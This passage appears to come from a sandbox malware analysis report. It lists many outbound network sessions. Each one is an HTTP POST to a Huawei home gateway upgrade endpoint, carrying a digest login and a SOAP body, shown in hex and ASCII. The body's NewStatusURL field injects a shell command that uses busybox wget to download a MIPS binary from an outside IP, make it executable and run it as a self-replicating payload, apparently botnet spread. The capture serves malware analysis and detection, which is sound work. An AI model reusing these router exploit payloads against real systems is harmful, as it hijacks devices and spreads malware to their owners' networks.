                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  88192.168.2.1345556122.105.86.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653697968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  89192.168.2.1343226157.61.158.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653698921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  90192.168.2.1356222157.127.230.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653719902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  91192.168.2.1357800157.118.203.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653753042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  92192.168.2.1336400197.154.124.11137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653811932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  93192.168.2.135443017.87.28.6037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653812885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  94192.168.2.1336314157.70.76.19537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653811932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  95192.168.2.1343424157.102.232.4637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653841972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  96192.168.2.133715041.255.220.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653867006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  97192.168.2.1350252119.20.1.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653938055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 